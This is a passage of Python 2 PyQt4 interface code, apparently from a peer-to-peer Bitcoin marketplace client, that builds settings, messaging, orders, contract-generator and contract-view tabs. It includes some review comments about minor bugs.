        self.save_button.setText(_translate("Form", "Save Changes", None))
        ##
        # Fill in existing user settings
        #
        self.email_lineEdit.setText(settings_dict['email'])
        self.nickname_lineEdit.setText(settings_dict['nickname'])
        self.bitcoin_lineEdit.setText(settings_dict['bitcoinReceivingAddress'])
        self.store_desc_edit.setText(settings_dict['storeDescription'])
        self.pubkey_textedit.setText(settings_dict['pubkey'])
        self.notary_servicedesc_textEdit.setText(settings_dict['description'])
        # 'percentage' is stored as a string index into the 0-10 combo box;
        # int() will raise ValueError for non-numeric values — TODO confirm
        # callers always store a digit string.
        self.percent_comboBox.setCurrentIndex(int(settings_dict['percentage']))
        self.recipient_lineEdit.setText(settings_dict['shippingInformation']['recipient'])
        self.street1_lineEdit.setText(settings_dict['shippingInformation']['street1'])
        self.street2_lineEdit.setText(settings_dict['shippingInformation']['street2'])
        self.city_lineEdit.setText(settings_dict['shippingInformation']['city'])
        self.province_lineEdit.setText(settings_dict['shippingInformation']['province/state/region'])
        self.zip_lineEdit.setText(settings_dict['shippingInformation']['postal/zip'])
        self.country_lineEdit.setText(settings_dict['shippingInformation']['country'])
        # guid is displayed hex-encoded; .encode('hex') implies it is stored
        # as raw bytes and that this file targets Python 2.
        self.guid_lineEdit.setText(settings_dict['guid'].encode('hex'))
        self.save_button.clicked.connect(self.saveChanges)
    ##
    # saveChanges(self)
    # Collects all filled in user data and sends to settings for saving
    def saveChanges(self):
        ret = dict()
        ret['nickname'] = self.nickname_lineEdit.text()
        ret['email'] = self.email_lineEdit.text()
        ret['bitcoinReceivingAddress'] = self.bitcoin_lineEdit.text()
        ret['storeDescription'] = self.store_desc_edit.toPlainText()
        ret['percentage'] = str(self.percent_comboBox.currentIndex())
        ret['description'] = self.notary_servicedesc_textEdit.toPlainText()
        # Nested shipping dict mirrors the keys read back in __init__.
        shipping = dict()
        shipping['recipient'] = self.recipient_lineEdit.text()
        shipping['street1'] = self.street1_lineEdit.text()
        shipping['street2'] = self.street2_lineEdit.text()
        shipping['city'] = self.city_lineEdit.text()
        shipping['province/state/region'] = self.province_lineEdit.text()
        shipping['postal/zip'] = self.zip_lineEdit.text()
        shipping['country'] = self.country_lineEdit.text()
        ret['shippingInformation'] = shipping
        # NOTE(review): these three fields are overwritten with empty strings
        # on every save — confirm existing values shouldn't be preserved.
        ret['avatarURL'] = ""
        ret['myMerchants'] = ""
        ret['isNotary'] = ""
        self.window().id_module.set_settings(ret)
        self.window().redraw()
##
# This class contains the UI for the "Send a message" tab:
# a "To:" recipient line, a subject line, a message body and
# Cancel/Send buttons.
#
class SendMessage_Ui2(QtGui.QWidget):
    ##
    # Constructor
    # Creates the "Send Message" tab.
    # Fix: the setObjectName strings were copy-paste leftovers from the
    # settings form ("keys_label", "bitcoin_lineEdit", "save_button", ...),
    # colliding with Settings_Ui2 widget names and breaking stylesheet /
    # findChild lookups by object name.  Each widget now uses its own
    # attribute name as its Qt object name.
    def __init__(self):
        super(SendMessage_Ui2, self).__init__()
        self.setObjectName(_fromUtf8("Form"))
        self.resize(400, 413)
        self.verticalLayoutWidget = QtGui.QWidget(self)
        self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 381, 391))
        self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
        self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
        self.verticalLayout.setMargin(0)
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        # Bold 14pt section header.
        self.send_message_label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.send_message_label.setFont(font)
        self.send_message_label.setObjectName(_fromUtf8("send_message_label"))
        self.verticalLayout.addWidget(self.send_message_label)
        # "To:" label + recipient line edit.
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        self.label = QtGui.QLabel(self.verticalLayoutWidget)
        self.label.setObjectName(_fromUtf8("label"))
        self.horizontalLayout.addWidget(self.label)
        self.lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.lineEdit.setObjectName(_fromUtf8("lineEdit"))
        self.horizontalLayout.addWidget(self.lineEdit)
        self.verticalLayout.addLayout(self.horizontalLayout)
        # Subject line and message body.
        self.message_subject_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
        self.message_subject_lineEdit.setObjectName(_fromUtf8("message_subject_lineEdit"))
        self.verticalLayout.addWidget(self.message_subject_lineEdit)
        self.message_body_textEdit = QtGui.QTextEdit(self.verticalLayoutWidget)
        self.message_body_textEdit.setObjectName(_fromUtf8("message_body_textEdit"))
        self.verticalLayout.addWidget(self.message_body_textEdit)
        # Bottom row: spacer pushes Cancel/Send to the right.
        self.horizontalLayout_2 = QtGui.QHBoxLayout()
        self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
        spacerItem = QtGui.QSpacerItem(100, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.horizontalLayout_2.addItem(spacerItem)
        self.cancel_button = QtGui.QPushButton(self.verticalLayoutWidget)
        self.cancel_button.setObjectName(_fromUtf8("cancel_button"))
        self.horizontalLayout_2.addWidget(self.cancel_button)
        self.send_button = QtGui.QPushButton(self.verticalLayoutWidget)
        self.send_button.setAutoFillBackground(False)
        self.send_button.setObjectName(_fromUtf8("send_button"))
        self.horizontalLayout_2.addWidget(self.send_button)
        self.verticalLayout.addLayout(self.horizontalLayout_2)
        # Translated / placeholder UI strings.
        self.setWindowTitle(_translate("Form", "Form", None))
        self.send_message_label.setText(_translate("Form", "Send Message", None))
        self.label.setText(_translate("Form", "To:", None))
        self.message_subject_lineEdit.setText(_translate("Form", "Enter a subject line", None))
        self.message_body_textEdit.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
        "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
        "p, li { white-space: pre-wrap; }\n"
        "</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
        "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Enter a message</p></body></html>", None))
        self.cancel_button.setText(_translate("Form", "Cancel", None))
        self.send_button.setText(_translate("Form", "Send", None))
##
# This class contains the UI for the "My Orders" menu
#
class Ui_OrdersMenu(object):
    ##
    # Lays the orders view out on OrdersMenu: an "Orders" header label over
    # two QListViews ("seller" and "buyer"), each paired with a vertical
    # scroll bar, then applies translated strings and Qt auto-connections.
    # @param OrdersMenu: the widget the UI is built onto
    def setupUi(self, OrdersMenu):
        OrdersMenu.setObjectName(_fromUtf8("OrdersMenu"))
        OrdersMenu.resize(400, 300)
        self.verticalLayoutWidget = QtGui.QWidget(OrdersMenu)
        self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 381, 281))
        self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
        self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
        self.verticalLayout.setMargin(0)
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        self.OrderLabel = QtGui.QLabel(self.verticalLayoutWidget)
        self.OrderLabel.setObjectName(_fromUtf8("OrderLabel"))
        self.verticalLayout.addWidget(self.OrderLabel)
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        self.seller = QtGui.QListView(self.verticalLayoutWidget)
        self.seller.setObjectName(_fromUtf8("seller"))
        self.horizontalLayout.addWidget(self.seller)
        self.sellerBar = QtGui.QScrollBar(self.verticalLayoutWidget)
        self.sellerBar.setOrientation(QtCore.Qt.Vertical)
        self.sellerBar.setObjectName(_fromUtf8("sellerBar"))
        self.horizontalLayout.addWidget(self.sellerBar)
        self.buyerBar = QtGui.QScrollBar(self.verticalLayoutWidget)
        self.buyerBar.setOrientation(QtCore.Qt.Vertical)
        self.buyerBar.setObjectName(_fromUtf8("buyerBar"))
        self.horizontalLayout.addWidget(self.buyerBar)
        self.buyer = QtGui.QListView(self.verticalLayoutWidget)
        self.buyer.setObjectName(_fromUtf8("buyer"))
        self.horizontalLayout.addWidget(self.buyer)
        self.verticalLayout.addLayout(self.horizontalLayout)
        self.retranslateUi(OrdersMenu)
        QtCore.QMetaObject.connectSlotsByName(OrdersMenu)
    ##
    # Standard pyuic hook: (re)applies all translatable UI strings.
    # @param OrdersMenu: the widget built by setupUi
    def retranslateUi(self, OrdersMenu):
        OrdersMenu.setWindowTitle(_translate("OrdersMenu", "Form", None))
        self.OrderLabel.setText(_translate("OrdersMenu", "Orders", None))
##
# ContractGenUi2
# This class holds the UI for the contract generator ("New Contract" tab):
# a grid of labelled input fields, keyword/image/description inputs, and a
# "Generate Contract" button that hands the collected data to the id module.
class ContractGenUi2(QtGui.QWidget):
    ##
    # Constructor
    # Draws the layout of the "New Contract" tab
    def __init__(self):
        super(ContractGenUi2, self).__init__()
        self.setObjectName(_fromUtf8("Form"))
        self.resize(788, 376)
        self.setAutoFillBackground(False)
        self.gridLayoutWidget = QtGui.QWidget(self)
        self.gridLayoutWidget.setGeometry(QtCore.QRect(10, 10, 671, 235))
        self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
        self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
        self.gridLayout.setMargin(0)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        # "Contract Generator" heading
        self.label = QtGui.QLabel(self.gridLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.label.setFont(font)
        self.label.setObjectName(_fromUtf8("store_details_label"))
        self.gridLayout.addWidget(self.label, 1, 0, 1, 1)
        # Input fields; the retranslate block at the end of __init__ maps
        # each row's label text to its line edit
        self.bitcoin_address_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
        self.bitcoin_address_lineEdit.setObjectName(_fromUtf8("bitcoin_lineEdit"))
        self.gridLayout.addWidget(self.bitcoin_address_lineEdit, 3, 1, 1, 1)
        self.label_7 = QtGui.QLabel(self.gridLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.label_7.setFont(font)
        self.label_7.setObjectName(_fromUtf8("nickname_label"))
        self.gridLayout.addWidget(self.label_7, 6, 0, 1, 1)
        self.price_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
        self.price_lineEdit.setObjectName(_fromUtf8("guid_lineEdit"))
        self.gridLayout.addWidget(self.price_lineEdit, 5, 1, 1, 1)
        self.expiry_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
        self.expiry_lineEdit.setObjectName(_fromUtf8("email_lineEdit"))
        self.gridLayout.addWidget(self.expiry_lineEdit, 6, 1, 1, 1)
        self.item_name_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
        self.item_name_lineEdit.setObjectName(_fromUtf8("add_notary_line"))
        self.gridLayout.addWidget(self.item_name_lineEdit, 4, 1, 1, 1)
        self.label_6 = QtGui.QLabel(self.gridLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.label_6.setFont(font)
        self.label_6.setObjectName(_fromUtf8("trusted_notaries_label"))
        self.gridLayout.addWidget(self.label_6, 5, 0, 1, 1)
        self.label_4 = QtGui.QLabel(self.gridLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.label_4.setFont(font)
        self.label_4.setObjectName(_fromUtf8("notary_details_label"))
        self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1)
        self.label_5 = QtGui.QLabel(self.gridLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.label_5.setFont(font)
        self.label_5.setObjectName(_fromUtf8("shipping_label"))
        self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1)
        self.label_2 = QtGui.QLabel(self.gridLayoutWidget)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.label_2.setFont(font)
        self.label_2.setLayoutDirection(QtCore.Qt.RightToLeft)
        self.label_2.setAutoFillBackground(False)
        self.label_2.setAlignment(QtCore.Qt.AlignCenter)
        self.label_2.setObjectName(_fromUtf8("keys_label"))
        self.gridLayout.addWidget(self.label_2, 2, 1, 1, 1)
        self.generate_contract_button = QtGui.QPushButton(self)
        self.generate_contract_button.setGeometry(QtCore.QRect(520, 260, 161, 27))
        self.generate_contract_button.setObjectName(_fromUtf8("add_notary_label"))
        ##
        # Add keywords
        self.keywords_label = QtGui.QLabel(self.gridLayoutWidget)
        self.keywords_label.setText("Add keywords")
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.keywords_label.setFont(font)
        self.keywords_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
        self.keywords_lineEdit.setText("Separate keywords by comma (ie word1,word2,word3,...,wordn)")
        self.gridLayout.addWidget(self.keywords_label)
        self.gridLayout.addWidget(self.keywords_lineEdit)
        ##
        # Add pictures
        self.browse_images_label = QtGui.QLabel(self.gridLayoutWidget)
        self.browse_images_label.setText("Add images (max 3):")
        self.browse_images_label.setFont(font)
        self.images_button = QtGui.QPushButton(self.gridLayoutWidget)
        self.images_button.setText("Browse...")
        self.gridLayout.addWidget(self.browse_images_label)
        self.gridLayout.addWidget(self.images_button)
        # Paths picked via find_images(); consumed by generate_from_input()
        self.images = list()
        ##
        # Add a description
        self.description_label = QtGui.QLabel(self.gridLayoutWidget)
        self.description_label.setText("Item Description:")
        self.description_label.setFont(font)
        self.gridLayout.addWidget(self.description_label)
        self.description_box = QtGui.QLineEdit(self.gridLayoutWidget)
        self.gridLayout.addWidget(self.description_box)
        ##
        # On clicked, generate the new contract data
        # On clicked, find pictures
        self.generate_contract_button.clicked.connect(self.generate_from_input)
        self.images_button.clicked.connect(self.find_images)
        self.label.setText(_translate("Form", "Contract Generator", None))
        self.label_7.setText(_translate("Form", "Offer expiry date", None))
        self.label_6.setText(_translate("Form", "Price (in BTC) of item to sell", None))
        self.label_4.setText(_translate("Form", "Your Bitcoin address", None))
        self.label_5.setText(_translate("Form", "Name of item to sell", None))
        self.label_2.setText(_translate("Form", "Contract", None))
        self.generate_contract_button.setText(_translate("Form", "Generate Contract", None))
    ##
    # Creates a new contract using the fields in the UI and hands it to the
    # id module, then redraws the main window.
    def generate_from_input(self):
        contract = dict()
        contract['expiry'] = str(self.expiry_lineEdit.text())
        contract['price'] = str(self.price_lineEdit.text())
        contract['bitcoin_address'] = str(self.bitcoin_address_lineEdit.text())
        contract['item_name'] = str(self.item_name_lineEdit.text())
        # Fix: the previous code stored str(<list>) — the repr of the split
        # result — but consumers (e.g. the contract view) join keywords with
        # ', '.join(...), which needs a list of plain strings. Convert each
        # comma-separated token to str and trim surrounding whitespace.
        contract['keywords'] = [str(keyword).strip() for keyword in self.keywords_lineEdit.text().split(',')]
        contract['description'] = str(self.description_box.text())
        contract['images'] = self.images
        self.window().id_module.new_contract(contract)
        self.window().redraw()
    ##
    # Browse and add images
    # Saves the first three selected image paths to self.images (list)
    def find_images(self):
        self.images = QtGui.QFileDialog.getOpenFileNames(self, 'Add Images', '', '')[0:3]
        if len(self.images) != 0:
            self.images_button.setText(str(len(self.images)) + " selected")
        else:
            self.images_button.setText("Browse...")
##
# This class holds the UI for the Contract View Tab.
# Renders a read-only view of one ricardian contract: item details, seller
# identity, up to three pictures, and a purchase form along the bottom.
class contractView_Tab(QtGui.QWidget):
    ##
    # Constructor
    # Creates the contract view tab
    # @param ricardian_contract: ricardian contract being viewed in the tab
    def __init__(self, ricardian_contract):
        super(contractView_Tab, self).__init__()
        # Kept so purchase_contract() can hand the exact contract object
        # back to the id module when "Purchase" is clicked
        self.contract_obj = ricardian_contract
        self.setObjectName(_fromUtf8("Form"))
        self.resize(1199, 1250)
        # Description browser area
        self.gridLayoutWidget = QtGui.QWidget(self)
        self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 570, 801, 231))
        self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
        self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
        self.gridLayout.setMargin(0)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.descriptionTextBrowser = QtGui.QTextBrowser(self.gridLayoutWidget)
        self.descriptionTextBrowser.setObjectName(_fromUtf8("descriptionTextBrowser"))
        self.gridLayout.addWidget(self.descriptionTextBrowser, 0, 0, 1, 1)
        # Static field labels (item name / price / date uploaded / expires)
        self.verticalLayoutWidget = QtGui.QWidget(self)
        self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 161, 181))
        self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
        self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
        self.verticalLayout.setMargin(0)
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        self.label = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(22)
        self.label.setFont(font)
        self.label.setObjectName(_fromUtf8("label"))
        self.verticalLayout.addWidget(self.label)
        self.label_2 = QtGui.QLabel(self.verticalLayoutWidget)
        font = QtGui.QFont()
        font.setPointSize(18)
        self.label_2.setFont(font)
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.verticalLayout.addWidget(self.label_2)
        self.label_3 = QtGui.QLabel(self.verticalLayoutWidget)
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.verticalLayout.addWidget(self.label_3)
        self.label_4 = QtGui.QLabel(self.verticalLayoutWidget)
        self.label_4.setObjectName(_fromUtf8("label_4"))
        self.verticalLayout.addWidget(self.label_4)
        # Value labels filled in from the trade/metadata modules below
        self.verticalLayoutWidget_3 = QtGui.QWidget(self)
        self.verticalLayoutWidget_3.setGeometry(QtCore.QRect(160, 0, 641, 181))
        self.verticalLayoutWidget_3.setObjectName(_fromUtf8("verticalLayoutWidget_3"))
        self.verticalLayout_3 = QtGui.QVBoxLayout(self.verticalLayoutWidget_3)
        self.verticalLayout_3.setMargin(0)
        self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
        self.itemName = QtGui.QLabel(self.verticalLayoutWidget_3)
        font = QtGui.QFont()
        font.setPointSize(22)
        self.itemName.setFont(font)
        self.itemName.setText(_fromUtf8(""))
        self.itemName.setObjectName(_fromUtf8("itemName"))
        self.verticalLayout_3.addWidget(self.itemName)
        self.price = QtGui.QLabel(self.verticalLayoutWidget_3)
        font = QtGui.QFont()
        font.setPointSize(18)
        self.price.setFont(font)
        self.price.setText(_fromUtf8(""))
        self.price.setObjectName(_fromUtf8("price"))
        self.verticalLayout_3.addWidget(self.price)
        self.dateUploaded = QtGui.QLabel(self.verticalLayoutWidget_3)
        self.dateUploaded.setText(_fromUtf8(""))
        self.dateUploaded.setObjectName(_fromUtf8("dateUploaded"))
        self.verticalLayout_3.addWidget(self.dateUploaded)
        self.expires = QtGui.QLabel(self.verticalLayoutWidget_3)
        self.expires.setText(_fromUtf8(""))
        self.expires.setObjectName(_fromUtf8("expires"))
        self.verticalLayout_3.addWidget(self.expires)
        self.label_6 = QtGui.QLabel(self)
        self.label_6.setGeometry(QtCore.QRect(0, 540, 91, 17))
        self.label_6.setObjectName(_fromUtf8("label_6"))
        # Picture strip: up to three image labels filled from trade['images']
        self.horizontalLayoutWidget = QtGui.QWidget(self)
        self.horizontalLayoutWidget.setGeometry(QtCore.QRect(0, 850, 801, 271))
        self.horizontalLayoutWidget.setObjectName(_fromUtf8("horizontalLayoutWidget"))
        self.horizontalLayout = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
        self.horizontalLayout.setMargin(0)
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        self.pictureOne = QtGui.QLabel(self.horizontalLayoutWidget)
        self.pictureOne.setText(_fromUtf8(""))
        self.pictureOne.setObjectName(_fromUtf8("pictureOne"))
        self.horizontalLayout.addWidget(self.pictureOne)
        self.pictureTwo = QtGui.QLabel(self.horizontalLayoutWidget)
        self.pictureTwo.setText(_fromUtf8(""))
        self.pictureTwo.setObjectName(_fromUtf8("pictureTwo"))
        self.horizontalLayout.addWidget(self.pictureTwo)
        self.pictureThree = QtGui.QLabel(self.horizontalLayoutWidget)
        self.pictureThree.setText(_fromUtf8(""))
        self.pictureThree.setObjectName(_fromUtf8("pictureThree"))
        self.horizontalLayout.addWidget(self.pictureThree)
        self.label_7 = QtGui.QLabel(self)
        self.label_7.setGeometry(QtCore.QRect(0, 820, 66, 17))
        self.label_7.setObjectName(_fromUtf8("label_7"))
        # Purchase form along the bottom of the tab
        self.label_8 = QtGui.QLabel(self)
        self.label_8.setGeometry(QtCore.QRect(40, 1210, 121, 17))
        self.label_8.setObjectName(_fromUtf8("label_8"))
        self.desiredQuantitySpinBox = QtGui.QSpinBox(self)
        self.desiredQuantitySpinBox.setGeometry(QtCore.QRect(170, 1200, 71, 31))
        self.desiredQuantitySpinBox.setObjectName(_fromUtf8("desiredQuantitySpinBox"))
        self.label_9 = QtGui.QLabel(self)
        self.label_9.setGeometry(QtCore.QRect(250, 1210, 131, 17))
        self.label_9.setObjectName(_fromUtf8("label_9"))
        self.noteForMerchantLineEdit = QtGui.QLineEdit(self)
        self.noteForMerchantLineEdit.setGeometry(QtCore.QRect(400, 1210, 321, 27))
        self.noteForMerchantLineEdit.setObjectName(_fromUtf8("noteForMerchantLineEdit"))
        self.purchaseButton = QtGui.QPushButton(self)
        self.purchaseButton.setGeometry(QtCore.QRect(730, 1210, 98, 27))
        self.purchaseButton.setObjectName(_fromUtf8("purchaseButton"))
        self.sellerAvatar = QtGui.QLabel(self)
        self.sellerAvatar.setGeometry(QtCore.QRect(990, 10, 201, 181))
        self.sellerAvatar.setText(_fromUtf8(""))
        self.sellerAvatar.setObjectName(_fromUtf8("sellerAvatar"))
        self.label_15 = QtGui.QLabel(self)
        self.label_15.setGeometry(QtCore.QRect(310, 1170, 81, 17))
        self.label_15.setObjectName(_fromUtf8("label_15"))
        self.keywords = QtGui.QLineEdit(self)
        self.keywords.setGeometry(QtCore.QRect(400, 1170, 321, 27))
        self.keywords.setObjectName(_fromUtf8("keywords"))
        # Seller identity panel (name, email, GUID, bitcoin address, pubkey)
        self.gridLayoutWidget_2 = QtGui.QWidget(self)
        self.gridLayoutWidget_2.setGeometry(QtCore.QRect(0, 190, 801, 322))
        self.gridLayoutWidget_2.setObjectName(_fromUtf8("gridLayoutWidget_2"))
        self.gridLayout_2 = QtGui.QGridLayout(self.gridLayoutWidget_2)
        self.gridLayout_2.setMargin(0)
        self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
        self.sellerName = QtGui.QLabel(self.gridLayoutWidget_2)
        font = QtGui.QFont()
        font.setPointSize(22)
        self.sellerName.setFont(font)
        self.sellerName.setText(_fromUtf8(""))
        self.sellerName.setObjectName(_fromUtf8("sellerName"))
        self.gridLayout_2.addWidget(self.sellerName, 0, 1, 1, 1)
        self.bitcoinReceivingAddress = QtGui.QTextBrowser(self.gridLayoutWidget_2)
        self.bitcoinReceivingAddress.setLineWrapMode(QtGui.QTextEdit.NoWrap)
        self.bitcoinReceivingAddress.setObjectName(_fromUtf8("bitcoinReceivingAddress"))
        self.gridLayout_2.addWidget(self.bitcoinReceivingAddress, 3, 1, 1, 1)
        self.guid = QtGui.QTextBrowser(self.gridLayoutWidget_2)
        self.guid.setLineWrapMode(QtGui.QTextEdit.NoWrap)
        self.guid.setObjectName(_fromUtf8("guid"))
        self.gridLayout_2.addWidget(self.guid, 2, 1, 1, 1)
        self.sellerEmail = QtGui.QLabel(self.gridLayoutWidget_2)
        font = QtGui.QFont()
        font.setPointSize(18)
        self.sellerEmail.setFont(font)
        self.sellerEmail.setText(_fromUtf8(""))
        self.sellerEmail.setObjectName(_fromUtf8("sellerEmail"))
        self.gridLayout_2.addWidget(self.sellerEmail, 1, 1, 1, 1)
        self.label_13 = QtGui.QLabel(self.gridLayoutWidget_2)
        self.label_13.setObjectName(_fromUtf8("label_13"))
        self.gridLayout_2.addWidget(self.label_13, 2, 0, 1, 1)
        self.publicKey = QtGui.QTextBrowser(self.gridLayoutWidget_2)
        self.publicKey.setLineWrapMode(QtGui.QTextEdit.NoWrap)
        self.publicKey.setObjectName(_fromUtf8("publicKey"))
        self.gridLayout_2.addWidget(self.publicKey, 4, 1, 1, 1)
        self.label_11 = QtGui.QLabel(self.gridLayoutWidget_2)
        font = QtGui.QFont()
        font.setPointSize(18)
        self.label_11.setFont(font)
        self.label_11.setObjectName(_fromUtf8("label_11"))
        self.gridLayout_2.addWidget(self.label_11, 1, 0, 1, 1)
        self.label_10 = QtGui.QLabel(self.gridLayoutWidget_2)
        font = QtGui.QFont()
        font.setPointSize(22)
        self.label_10.setFont(font)
        self.label_10.setObjectName(_fromUtf8("label_10"))
        self.gridLayout_2.addWidget(self.label_10, 0, 0, 1, 1)
        self.label_12 = QtGui.QLabel(self.gridLayoutWidget_2)
        self.label_12.setObjectName(_fromUtf8("label_12"))
        self.gridLayout_2.addWidget(self.label_12, 3, 0, 1, 1)
        self.label_14 = QtGui.QLabel(self.gridLayoutWidget_2)
        self.label_14.setObjectName(_fromUtf8("label_14"))
        self.gridLayout_2.addWidget(self.label_14, 4, 0, 1, 1)
        self.label_5 = QtGui.QLabel(self)
        self.label_5.setGeometry(QtCore.QRect(330, 1130, 66, 17))
        self.label_5.setObjectName(_fromUtf8("label_5"))
        self.ledger = QtGui.QLineEdit(self)
        self.ledger.setGeometry(QtCore.QRect(400, 1130, 321, 27))
        self.ledger.setObjectName(_fromUtf8("ledger"))
        # Static label texts
        self.label.setText(_translate("Form", "Item Name:", None))
        self.label_2.setText(_translate("Form", "Price:", None))
        self.label_3.setText(_translate("Form", "Date Uploaded:", None))
        self.label_4.setText(_translate("Form", "Expires:", None))
        self.label_6.setText(_translate("Form", "Description: ", None))
        self.label_7.setText(_translate("Form", "Pictures:", None))
        self.label_8.setText(_translate("Form", "Desired Quantity:", None))
        self.label_9.setText(_translate("Form", "Note for Merchant:", None))
        self.purchaseButton.setText(_translate("Form", "Purchase", None))
        self.label_15.setText(_translate("Form", "Keywords:", None))
        # NOTE(review): the setHtml calls below seed the browsers with
        # placeholder text left over from UI prototyping; they are overwritten
        # with real values by the setText calls further down
        self.bitcoinReceivingAddress.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfsdddddddddddddddddddddddddddddddddddddddddddddddddasdfasdfasdfasdfasdfasdfasdffdasdf</p></body></html>", None))
        self.guid.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfsddddddddddddddddddddddddddddddddddddddddddddddddd</p></body></html>", None))
        self.label_13.setText(_translate("Form", "GUID:", None))
        self.publicKey.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfsddddddddddddddddddddddddddddddddddddddddddddddddd</p></body></html>", None))
        self.label_11.setText(_translate("Form", "Seller Email:", None))
        self.label_10.setText(_translate("Form", "Seller Name:", None))
        self.label_12.setText(_translate("Form", "Bitcoin Receiving Address:", None))
        self.label_14.setText(_translate("Form", "Public Key:", None))
        self.label_5.setText(_translate("Form", "Ledger:", None))
        # Pull the contract modules this view renders.
        # NOTE(review): 'id' shadows the builtin id() for the rest of this
        # method; harmless here but worth renaming.
        meta = ricardian_contract.get_module('metadata')
        id = ricardian_contract.get_module('id')
        trade = ricardian_contract.get_module('trade')
        # NOTE(review): 'ledger' is fetched but never used below, and the
        # self.ledger line edit is never filled — confirm intent.
        ledger = ricardian_contract.get_module('ledger')
        ##
        # Set values from the trade module
        # assumes trade['name']/trade['price'] are strings and
        # trade['keywords'] is an iterable of strings — TODO confirm
        self.itemName.setText(trade['name'])
        self.price.setText(trade['price'])
        self.descriptionTextBrowser.setText(trade['description'])
        self.keywords.setText(', '.join(trade['keywords']))
        # Only the first three images have labels; any further entries in
        # trade['images'] are silently ignored
        for count, image_store in enumerate(trade['images']):
            if count == 0:
                self.pictureOne.setPixmap(image_store.get_repr().toqpixmap())
                self.pictureOne.setScaledContents(True)
            elif count == 1:
